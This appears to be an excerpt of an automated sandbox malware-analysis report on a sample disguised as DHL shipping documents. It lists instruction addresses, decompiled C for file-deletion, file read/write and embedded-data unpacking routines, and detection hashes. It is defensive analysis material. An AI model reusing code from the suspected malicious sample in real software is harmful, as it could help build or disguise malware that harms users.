                        0x00406dc4
                        0x00406dc5
                        0x00406dc8
                        0x00000000
                        0x00406dc8
                        0x00000000
                        0x00406ffe
                        0x00407002
                        0x00407020
                        0x00407023
                        0x0040702a
                        0x0040702d
                        0x00407030
                        0x00407033
                        0x00407036
                        0x00407039
                        0x0040703b
                        0x00407042
                        0x00407043
                        0x00407045
                        0x00407048
                        0x0040704b
                        0x0040704e
                        0x0040704e
                        0x00407053
                        0x00000000
                        0x00407053
                        0x00407004
                        0x00407007
                        0x0040700a
                        0x00407014
                        0x004073cb
                        0x004073cb
                        0x00000000
                        0x004073cb
                        0x00000000
                        0x00000000
                        0x00000000
                        0x004070ab
                        0x004070af
                        0x00000000
                        0x00000000
                        0x004070b5
                        0x004070b9
                        0x00000000
                        0x00000000
                        0x004070bf
                        0x004070c1
                        0x004070c5
                        0x004070c5
                        0x004070c8
                        0x004070cc
                        0x00000000
                        0x00000000
                        0x0040711c
                        0x00407120
                        0x00407127
                        0x0040712a
                        0x0040712d
                        0x00407137
                        0x004073cb
                        0x004073cb
                        0x00000000
                        0x004073cb
                        0x004073cb
                        0x00407122
                        0x00000000
                        0x00000000
                        0x00407143
                        0x00407147
                        0x0040714e
                        0x00407151
                        0x00407154
                        0x00407149
                        0x00407149
                        0x00407149
                        0x00407157
                        0x0040715a
                        0x0040715d
                        0x0040715d
                        0x00407160
                        0x00407163
                        0x00407166
                        0x00407166
                        0x00407169
                        0x00407170
                        0x00407175
                        0x00000000
                        0x00000000
                        0x00407203
                        0x00407203
                        0x00407207
                        0x004075a5
                        0x00000000
                        0x004075a5
                        0x0040720d
                        0x00407210
                        0x00407213
                        0x00407217
                        0x0040721a
                        0x00407220
                        0x00407222
                        0x00407222
                        0x00407222
                        0x00407225
                        0x00407228
                        0x00000000
                        0x00000000
                        0x00406df8
                        0x00406df8
                        0x00406dfc
                        0x00407569
                        0x00000000
                        0x00407569
                        0x00406e02
                        0x00406e05
                        0x00406e08
                        0x00406e0c
                        0x00406e0f
                        0x00406e15
                        0x00406e17
                        0x00406e17
                        0x00406e17
                        0x00406e1a
                        0x00406e1d
                        0x00406e1d
                        0x00406e20
                        0x00406e23
                        0x00000000
                        0x00000000
                        0x00406e29
                        0x00406e2f
                        0x00000000
                        0x00000000
                        0x00406e35
                        0x00406e35
                        0x00406e39
                        0x00406e3c
                        0x00406e3f
                        0x00406e42
                        0x00406e45
                        0x00406e46
                        0x00406e49
                        0x00406e4b
                        0x00406e51
                        0x00406e54
                        0x00406e57
                        0x00406e5a
                        0x00406e5d
                        0x00406e60
                        0x00406e63
                        0x00406e7f
                        0x00406e82
                        0x00406e85
                        0x00406e88
                        0x00406e8f
                        0x00406e93
                        0x00406e95
                        0x00406e99
                        0x00406e65
                        0x00406e65
                        0x00406e69
                        0x00406e71
                        0x00406e76
                        0x00406e78
                        0x00406e7a
                        0x00406e7a
                        0x00406e9c
                        0x00406ea3
                        0x00406ea6
                        0x00000000
                        0x00406eac
                        0x00000000
                        0x00406eac
                        0x00000000
                        0x00406eb1
                        0x00406eb1
                        0x00406eb5
                        0x00407575
                        0x00000000
                        0x00407575
                        0x00406ebb
                        0x00406ebe
                        0x00406ec1
                        0x00406ec5
                        0x00406ec8
                        0x00406ece
                        0x00406ed0
                        0x00406ed0
                        0x00406ed0
                        0x00406ed3
                        0x00406ed6
                        0x00406ed6
                        0x00406ed6
                        0x00406edc
                        0x00000000
                        0x00000000
                        0x00406ede
                        0x00406ee1
                        0x00406ee4
                        0x00406ee7
                        0x00406eea
                        0x00406eed
                        0x00406ef0
                        0x00406ef3
                        0x00406ef6
                        0x00406ef9
                        0x00406efc
                        0x00406f14
                        0x00406f17
                        0x00406f1a
                        0x00406f1d
                        0x00406f1d
                        0x00406f20
                        0x00406f24
                        0x00406f26
                        0x00406efe
                        0x00406efe
                        0x00406f06
                        0x00406f0b
                        0x00406f0d
                        0x00406f0f
                        0x00406f0f
                        0x00406f29
                        0x00406f30
                        0x00406f33
                        0x00000000
                        0x00406f35
                        0x00000000
                        0x00406f35
                        0x00406f33
                        0x00406f3a
                        0x00406f3a
                        0x00406f3a
                        0x00406f3a
                        0x00000000
                        0x00000000
                        0x00406f75
                        0x00406f75
                        0x00406f79
                        0x00407581
                        0x00000000
                        0x00407581
                        0x00406f7f
                        0x00406f82
                        0x00406f85
                        0x00406f89
                        0x00406f8c
                        0x00406f92
                        0x00406f94
                        0x00406f94
                        0x00406f94
                        0x00406f97
                        0x00406f9a
                        0x00406f9a
                        0x00406fa0
                        0x00406f3e
                        0x00406f3e
                        0x00406f41
                        0x00000000
                        0x00406f41
                        0x00406fa2
                        0x00406fa2
                        0x00406fa5
                        0x00406fa8
                        0x00406fab
                        0x00406fae
                        0x00406fb1
                        0x00406fb4
                        0x00406fb7
                        0x00406fba
                        0x00406fbd
                        0x00406fc0
                        0x00406fd8
                        0x00406fdb
                        0x00406fde
                        0x00406fe1
                        0x00406fe1
                        0x00406fe4
                        0x00406fe8
                        0x00406fea
                        0x00406fc2
                        0x00406fc2
                        0x00406fca
                        0x00406fcf
                        0x00406fd1
                        0x00406fd3
                        0x00406fd3
                        0x00406fed
                        0x00406ff4
                        0x00406ff7
                        0x00000000
                        0x00406ff9
                        0x00000000
                        0x00406ff9
                        0x00000000
                        0x00407286
                        0x00407286
                        0x0040728a
                        0x004075b1
                        0x00000000
                        0x004075b1
                        0x00407290
                        0x00407293
                        0x00407296
                        0x0040729a
                        0x0040729d
                        0x004072a3
                        0x004072a5
                        0x004072a5
                        0x004072a5
                        0x004072a8
                        0x00000000
                        0x00000000
                        0x00407056
                        0x00407056
                        0x00407059
                        0x004073cb
                        0x004073cb
                        0x00000000
                        0x004073cb
                        0x00000000
                        0x00407395
                        0x00407399
                        0x004073bb
                        0x004073be
                        0x004073c8
                        0x004073cb
                        0x004073cb
                        0x00000000
                        0x004073cb
                        0x004073cb
                        0x0040739b
                        0x0040739e
                        0x004073a2
                        0x004073a5
                        0x004073a5
                        0x004073a8
                        0x00000000
                        0x00000000
                        0x00407452
                        0x00407456
                        0x00407474
                        0x00407474
                        0x00407474
                        0x0040747b
                        0x00407482
                        0x00407489
                        0x00407489
                        0x00000000
                        0x00407489
                        0x00407458
                        0x0040745b
                        0x0040745e
                        0x00407461
                        0x00407468
                        0x004073ac
                        0x004073ac
                        0x004073af
                        0x00000000
                        0x00000000
                        0x00407543
                        0x00407546
                        0x00407447
                        0x00000000
                        0x00000000
                        0x0040717d
                        0x0040717f
                        0x00407186
                        0x00407187
                        0x00407189
                        0x0040718c
                        0x00000000
                        0x00000000
                        0x00407194
                        0x00407197
                        0x0040719a
                        0x0040719c
                        0x0040719e
                        0x0040719e
                        0x0040719f
                        0x004071a2
                        0x004071a9
                        0x004071ac
                        0x004071ba
                        0x00000000
                        0x00000000
                        0x00407490
                        0x00407490
                        0x00407493
                        0x0040749a
                        0x00000000
                        0x00000000
                        0x0040749f
                        0x0040749f
                        0x004074a3
                        0x004075db
                        0x00000000
                        0x004075db
                        0x004074a9
                        0x004074ac
                        0x004074af
                        0x004074b3
                        0x004074b6
                        0x004074bc
                        0x004074be
                        0x004074be
                        0x004074be
                        0x004074c1
                        0x004074c4
                        0x004074c4
                        0x004074c4
                        0x004074c4
                        0x004074c7
                        0x004074c7
                        0x004074cb
                        0x0040752b
                        0x0040752e
                        0x00407533
                        0x00407534
                        0x00407536
                        0x00407538
                        0x0040753b
                        0x00407447
                        0x00407447
                        0x00000000
                        0x0040744d
                        0x00407447
                        0x004074cd
                        0x004074d3
                        0x004074d6
                        0x004074d9
                        0x004074dc
                        0x004074df
                        0x004074e2
                        0x004074e5
                        0x004074e8
                        0x004074eb
                        0x004074ee
                        0x00407507
                        0x0040750a
                        0x0040750d
                        0x00407510
                        0x00407514
                        0x00407516
                        0x00407516
                        0x00407517
                        0x0040751a
                        0x004074f0
                        0x004074f0
                        0x004074f8
                        0x004074fd
                        0x004074ff
                        0x00407502
                        0x00407502
                        0x0040751d
                        0x00407524
                        0x00000000
                        0x00407526
                        0x00000000
                        0x00407526
                        0x00000000
                        0x004071c2
                        0x004071c5
                        0x004071fb
                        0x0040732b
                        0x0040732b
                        0x0040732b
                        0x0040732b
                        0x0040732e
                        0x0040732e
                        0x00407331
                        0x00407333
                        0x004075bd
                        0x00000000
                        0x004075bd
                        0x00407339
                        0x0040733c
                        0x00000000
                        0x00000000
                        0x00407342
                        0x00407346
                        0x00407349
                        0x00407349
                        0x00407349
                        0x00000000
                        0x00407349
                        0x004071c7
                        0x004071c9
                        0x004071cb
                        0x004071cd
                        0x004071d0
                        0x004071d1
                        0x004071d3
                        0x004071d5
                        0x004071d8
                        0x004071db
                        0x004071f1
                        0x004071f6
                        0x0040722e
                        0x0040722e
                        0x00407232
                        0x0040725e
                        0x00407260
                        0x00407267
                        0x0040726a
                        0x0040726d
                        0x0040726d
                        0x00407272
                        0x00407272
                        0x00407274
                        0x00407277
                        0x0040727e
                        0x00407281
                        0x004072ae
                        0x004072ae
                        0x004072b1
                        0x004072b4
                        0x00407328
                        0x00407328
                        0x00407328
                        0x00000000
                        0x00407328
                        0x004072b6
                        0x004072bc
                        0x004072bf
                        0x004072c2
                        0x004072c5
                        0x004072c8
                        0x004072cb
                        0x004072ce
                        0x004072d1
                        0x004072d4
                        0x004072d7
                        0x004072f0
                        0x004072f2
                        0x004072f5
                        0x004072f6
                        0x004072f9
                        0x004072fb
                        0x004072fe
                        0x00407300
                        0x00407302
                        0x00407305
                        0x00407307
                        0x0040730a
                        0x0040730e
                        0x00407310
                        0x00407310
                        0x00407311
                        0x00407314
                        0x00407317
                        0x004072d9
                        0x004072d9
                        0x004072e1
                        0x004072e6
                        0x004072e8
                        0x004072eb
                        0x004072eb
                        0x0040731a
                        0x00407321
                        0x004072ab
                        0x004072ab
                        0x004072ab
                        0x004072ab
                        0x00000000
                        0x00407323
                        0x00000000
                        0x00407323
                        0x00407321
                        0x00407234
                        0x00407237
                        0x00407239
                        0x0040723c
                        0x0040723f
                        0x00407242
                        0x00407244
                        0x00407247
                        0x0040724a
                        0x0040724a
                        0x0040724d
                        0x0040724d
                        0x00407250
                        0x00407257
                        0x0040722b
                        0x0040722b
                        0x0040722b
                        0x0040722b
                        0x00000000
                        0x00407259
                        0x00000000
                        0x00407259
                        0x00407257
                        0x004071dd
                        0x004071e0
                        0x004071e2
                        0x004071e5
                        0x00000000
                        0x00000000
                        0x00406f44
                        0x00406f44
                        0x00406f48
                        0x0040758d
                        0x00000000
                        0x0040758d
                        0x00406f4e
                        0x00406f51
                        0x00406f54
                        0x00406f57
                        0x00406f5a
                        0x00406f5d
                        0x00406f60
                        0x00406f62
                        0x00406f65
                        0x00406f68
                        0x00406f6b
                        0x00406f6d
                        0x00406f6d
                        0x00406f6d
                        0x00000000
                        0x00000000
                        0x004070cf
                        0x004070cf
                        0x004070d3
                        0x00407599
                        0x00000000
                        0x00407599
                        0x004070d9
                        0x004070dc
                        0x004070df
                        0x004070e2
                        0x004070e4
                        0x004070e4
                        0x004070e4
                        0x004070e7
                        0x004070ea
                        0x004070ed
                        0x004070f0
                        0x004070f3
                        0x004070f6
                        0x004070f7
                        0x004070f9
                        0x004070f9
                        0x004070f9
                        0x004070fc
                        0x004070ff
                        0x00407102
                        0x00407105
                        0x00407105
                        0x00407105
                        0x00407108
                        0x0040710a
                        0x0040710a
                        0x00000000
                        0x00000000
                        0x0040734c
                        0x0040734c
                        0x0040734c
                        0x00407350
                        0x00000000
                        0x00000000
                        0x00407356
                        0x00407359
                        0x0040735c
                        0x0040735f
                        0x00407361
                        0x00407361
                        0x00407361
                        0x00407364
                        0x00407367
                        0x0040736a
                        0x0040736d
                        0x00407370
                        0x00407373
                        0x00407374
                        0x00407376
                        0x00407376
                        0x00407376
                        0x00407379
                        0x0040737c
                        0x0040737f
                        0x00407382
                        0x00407385
                        0x00407389
                        0x0040738b
                        0x0040738e
                        0x00000000
                        0x00407390
                        0x0040710d
                        0x0040710d
                        0x00000000
                        0x0040710d
                        0x0040738e
                        0x004075c3
                        0x00000000
                        0x00000000
                        0x00406bf2
                        0x004075fa
                        0x004075fa
                        0x00000000
                        0x004075fa
                        0x00407447
                        0x004073ce
                        0x004073cb

                        Memory Dump Source
                        • Source File: 00000000.00000002.266044855.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.266038010.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266059378.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266123296.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_DHL AWB SHIPPING DOCS_AWB_0009123.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: b33066b9a67caffcdb2859c2a3d237c195f810e8b6f417b46283b98aba377de3
                        • Instruction ID: 947ff9f4813c08031b822263453b6bbc7859602ae013fffc9a74d3363ad91bbb
                        • Opcode Fuzzy Hash: b33066b9a67caffcdb2859c2a3d237c195f810e8b6f417b46283b98aba377de3
                        • Instruction Fuzzy Hash: FE713471E04228DBEF28CF98C8547ADBBB1FF44305F15806AD856BB281C778A986DF45
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00405D2C Relevance: 4.5, APIs: 3, Instructions: 28fileCOMMON
                        Download Yara Rule
                        C-Code - Quality: 41%
                        			E00405D2C(void* __eflags, WCHAR* _a4, signed int _a8) {
				int _t9;
				long _t13;
				WCHAR* _t14;

				_t14 = _a4;
				_t13 = E00406133(_t14);
				if(_t13 == 0xffffffff) {
					L8:
					return 0;
				}
				_push(_t14);
				if((_a8 & 0x00000001) == 0) {
					_t9 = DeleteFileW();
				} else {
					_t9 = RemoveDirectoryW(); // executed
				}
				if(_t9 == 0) {
					if((_a8 & 0x00000004) == 0) {
						SetFileAttributesW(_t14, _t13);
					}
					goto L8;
				} else {
					return 1;
				}
			}






                        0x00405d2d
                        0x00405d38
                        0x00405d3d
                        0x00405d6d
                        0x00000000
                        0x00405d6d
                        0x00405d44
                        0x00405d45
                        0x00405d4f
                        0x00405d47
                        0x00405d47
                        0x00405d47
                        0x00405d57
                        0x00405d63
                        0x00405d67
                        0x00405d67
                        0x00000000
                        0x00405d59
                        0x00000000
                        0x00405d5b

                        APIs
                          • Part of subcall function 00406133: GetFileAttributesW.KERNELBASE(?,?,00405D38,?,?,00000000,00405F0E,?,?,?,?), ref: 00406138
                          • Part of subcall function 00406133: SetFileAttributesW.KERNELBASE(?,00000000), ref: 0040614C
                        • RemoveDirectoryW.KERNELBASE(?,?,?,00000000,00405F0E), ref: 00405D47
                        • DeleteFileW.KERNEL32(?,?,?,00000000,00405F0E), ref: 00405D4F
                        • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405D67
                        Memory Dump Source
                        • Source File: 00000000.00000002.266044855.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.266038010.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266059378.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266123296.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_DHL AWB SHIPPING DOCS_AWB_0009123.jbxd
                        Similarity
                        • API ID: File$Attributes$DeleteDirectoryRemove
                        • String ID:
                        • API String ID: 1655745494-0
                        • Opcode ID: 80ad4dccc83bd5cfbcd7ef077da852fe0cb096cb549a199170c52783d075929e
                        • Instruction ID: f7500ddcb6900c42920b0fa7cdf939b3a50fd8fb6693fff67202f671924a8b23
                        • Opcode Fuzzy Hash: 80ad4dccc83bd5cfbcd7ef077da852fe0cb096cb549a199170c52783d075929e
                        • Instruction Fuzzy Hash: 6DE0E531218A9156C3207734AD0CB5B2A98EF86314F09893FF5A2B11E0D77885078AAD
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00406AE0 Relevance: 4.5, APIs: 3, Instructions: 27synchronizationCOMMON
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E00406AE0(void* __ecx, void* _a4) {
				long _v8;
				long _t6;

				_t6 = WaitForSingleObject(_a4, 0x64);
				while(_t6 == 0x102) {
					E00406A71(0xf);
					_t6 = WaitForSingleObject(_a4, 0x64);
				}
				GetExitCodeProcess(_a4,  &_v8); // executed
				return _v8;
			}





                        0x00406af1
                        0x00406b08
                        0x00406afc
                        0x00406b06
                        0x00406b06
                        0x00406b13
                        0x00406b1f

                        APIs
                        • WaitForSingleObject.KERNEL32(?,00000064), ref: 00406AF1
                        • WaitForSingleObject.KERNEL32(?,00000064,0000000F), ref: 00406B06
                        • GetExitCodeProcess.KERNELBASE ref: 00406B13
                        Memory Dump Source
                        • Source File: 00000000.00000002.266044855.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.266038010.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266059378.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266123296.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_DHL AWB SHIPPING DOCS_AWB_0009123.jbxd
                        Similarity
                        • API ID: ObjectSingleWait$CodeExitProcess
                        • String ID:
                        • API String ID: 2567322000-0
                        • Opcode ID: c0daa64154bb0774b0f48346674b492318025e1df3185352ae56c24ee987a067
                        • Instruction ID: dffe0f0baa3edeb4a8159ab808a8d66eaa88359a938bc324e0f181ad12cbd91f
                        • Opcode Fuzzy Hash: c0daa64154bb0774b0f48346674b492318025e1df3185352ae56c24ee987a067
                        • Instruction Fuzzy Hash: 36E09236600118FBDB00AB54DD05E9E7B6ADB45704F114036FA05B6190C6B1AE22DA94
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0040620A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 22fileCOMMON
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E0040620A(void* _a4, void* _a8, long _a12) {
				int _t7;
				long _t11;

				_t11 = _a12;
				_t7 = WriteFile(_a4, _a8, _t11,  &_a12, 0); // executed
				if(_t7 == 0 || _t11 != _a12) {
					return 0;
				} else {
					return 1;
				}
			}





                        0x0040620e
                        0x0040621e
                        0x00406226
                        0x00000000
                        0x0040622d
                        0x00000000
                        0x0040622f

                        APIs
                        • WriteFile.KERNELBASE(?,00000000,00000000,00000000,00000000,0040FACF,codeIncrementalHandleCreate,00403579,codeIncrementalHandleCreate,0040FACF,00414EF0,00004000,?,00000000,004033A3,00000004), ref: 0040621E
                        Strings
                        • codeIncrementalHandleCreate, xrefs: 0040620A
                        Memory Dump Source
                        • Source File: 00000000.00000002.266044855.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.266038010.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266059378.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266123296.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_DHL AWB SHIPPING DOCS_AWB_0009123.jbxd
                        Similarity
                        • API ID: FileWrite
                        • String ID: codeIncrementalHandleCreate
                        • API String ID: 3934441357-1664959861
                        • Opcode ID: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                        • Instruction ID: 398385dbb58ca0a44fa402a726e0ab0b2131cea3ae709c8a1b666252059dd88a
                        • Opcode Fuzzy Hash: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                        • Instruction Fuzzy Hash: F6E08632141129EBCF10AE548C00EEB375CFB01350F014476F955E3040D330E93087A5
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 004061DB Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 22fileCOMMON
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E004061DB(void* _a4, void* _a8, long _a12) {
				int _t7;
				long _t11;

				_t11 = _a12;
				_t7 = ReadFile(_a4, _a8, _t11,  &_a12, 0); // executed
				if(_t7 == 0 || _t11 != _a12) {
					return 0;
				} else {
					return 1;
				}
			}





                        0x004061df
                        0x004061ef
                        0x004061f7
                        0x00000000
                        0x004061fe
                        0x00000000
                        0x00406200

                        APIs
                        • ReadFile.KERNELBASE(?,00000000,00000000,00000000,00000000,00414EF0,codeIncrementalHandleCreate,004035F5,?,?,004034F9,00414EF0,00004000,?,00000000,004033A3), ref: 004061EF
                        Strings
                        • codeIncrementalHandleCreate, xrefs: 004061DB
                        Memory Dump Source
                        • Source File: 00000000.00000002.266044855.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.266038010.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266059378.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266123296.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_DHL AWB SHIPPING DOCS_AWB_0009123.jbxd
                        Similarity
                        • API ID: FileRead
                        • String ID: codeIncrementalHandleCreate
                        • API String ID: 2738559852-1664959861
                        • Opcode ID: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
                        • Instruction ID: 689b8facb1381159ac92aeccc4703b7db47ce2620db9a14c340ec3ef8a35c8b1
                        • Opcode Fuzzy Hash: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
                        • Instruction Fuzzy Hash: C1E0863250021AABDF10AE518C04AEB375CEB01360F014477F922E2150D230E82187E8
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00403371 Relevance: 3.1, APIs: 2, Instructions: 88COMMON
                        Download Yara Rule
                        C-Code - Quality: 92%
                        			E00403371(void* __ecx, long _a4, void* _a8, void* _a12, long _a16) {
				long _v8;
				long _t21;
				long _t22;
				void* _t24;
				long _t26;
				int _t27;
				long _t28;
				void* _t29;
				void* _t30;
				long _t31;
				long _t32;
				long _t36;

				_t21 = _a4;
				if(_t21 >= 0) {
					_t32 = _t21 +  *0x42a2b8;
					 *0x420ef4 = _t32;
					SetFilePointer( *0x40a01c, _t32, 0, 0); // executed
				}
				_t22 = E00403479(4);
				if(_t22 >= 0) {
					_t24 = E004061DB( *0x40a01c,  &_a4, 4); // executed
					if(_t24 == 0) {
						L18:
						_push(0xfffffffd);
						goto L19;
					} else {
						 *0x420ef4 =  *0x420ef4 + 4;
						_t36 = E00403479(_a4);
						if(_t36 < 0) {
							L21:
							_t22 = _t36;
						} else {
							if(_a12 != 0) {
								_t26 = _a4;
								if(_t26 >= _a16) {
									_t26 = _a16;
								}
								_t27 = ReadFile( *0x40a01c, _a12, _t26,  &_v8, 0); // executed
								if(_t27 != 0) {
									_t36 = _v8;
									 *0x420ef4 =  *0x420ef4 + _t36;
									goto L21;
								} else {
									goto L18;
								}
							} else {
								if(_a4 <= 0) {
									goto L21;
								} else {
									while(1) {
										_t28 = _a4;
										if(_a4 >= 0x4000) {
											_t28 = 0x4000;
										}
										_v8 = _t28;
										_t29 = E004061DB( *0x40a01c, 0x414ef0, _t28); // executed
										if(_t29 == 0) {
											goto L18;
										}
										_t30 = E0040620A(_a8, 0x414ef0, _v8); // executed
										if(_t30 == 0) {
											_push(0xfffffffe);
											L19:
											_pop(_t22);
										} else {
											_t31 = _v8;
											_a4 = _a4 - _t31;
											 *0x420ef4 =  *0x420ef4 + _t31;
											_t36 = _t36 + _t31;
											if(_a4 > 0) {
												continue;
											} else {
												goto L21;
											}
										}
										goto L22;
									}
									goto L18;
								}
							}
						}
					}
				}
				L22:
				return _t22;
			}















                        0x00403375
                        0x0040337e
                        0x00403387
                        0x0040338b
                        0x00403396
                        0x00403396
                        0x0040339e
                        0x004033a5
                        0x004033b7
                        0x004033be
                        0x00403463
                        0x00403463
                        0x00000000
                        0x004033c4
                        0x004033c7
                        0x004033d3
                        0x004033d7
                        0x00403471
                        0x00403471
                        0x004033dd
                        0x004033e0
                        0x0040343f
                        0x00403445
                        0x00403447
                        0x00403447
                        0x00403459
                        0x00403461
                        0x00403468
                        0x0040346b
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x004033e2
                        0x004033e5
                        0x00000000
                        0x004033eb
                        0x004033f0
                        0x004033f7
                        0x004033fa
                        0x004033fc
                        0x004033fc
                        0x00403409
                        0x0040340c
                        0x00403413
                        0x00000000
                        0x00000000
                        0x0040341c
                        0x00403423
                        0x0040343b
                        0x00403465
                        0x00403465
                        0x00403425
                        0x00403425
                        0x00403428
                        0x0040342b
                        0x00403431
                        0x00403437
                        0x00000000
                        0x00403439
                        0x00000000
                        0x00403439
                        0x00403437
                        0x00000000
                        0x00403423
                        0x00000000
                        0x004033f0
                        0x004033e5
                        0x004033e0
                        0x004033d7
                        0x004033be
                        0x00403473
                        0x00403476

                        APIs
                        • SetFilePointer.KERNELBASE(?,00000000,00000000,00000000,00000000,?,?,0040331D,000000FF,00000000,00000000,?,?), ref: 00403396
                        Memory Dump Source
                        • Source File: 00000000.00000002.266044855.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.266038010.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266059378.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266123296.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_DHL AWB SHIPPING DOCS_AWB_0009123.jbxd
                        Similarity
                        • API ID: FilePointer
                        • String ID:
                        • API String ID: 973152223-0
                        • Opcode ID: b1bf35b654f0c361909532a2badc84153f12731a676864620281ad9f652e4f28
                        • Instruction ID: 963a71f16df831595788c30304fa9cedbf2cad19eb63879c1ada4fe15c9ed8fa
                        • Opcode Fuzzy Hash: b1bf35b654f0c361909532a2badc84153f12731a676864620281ad9f652e4f28
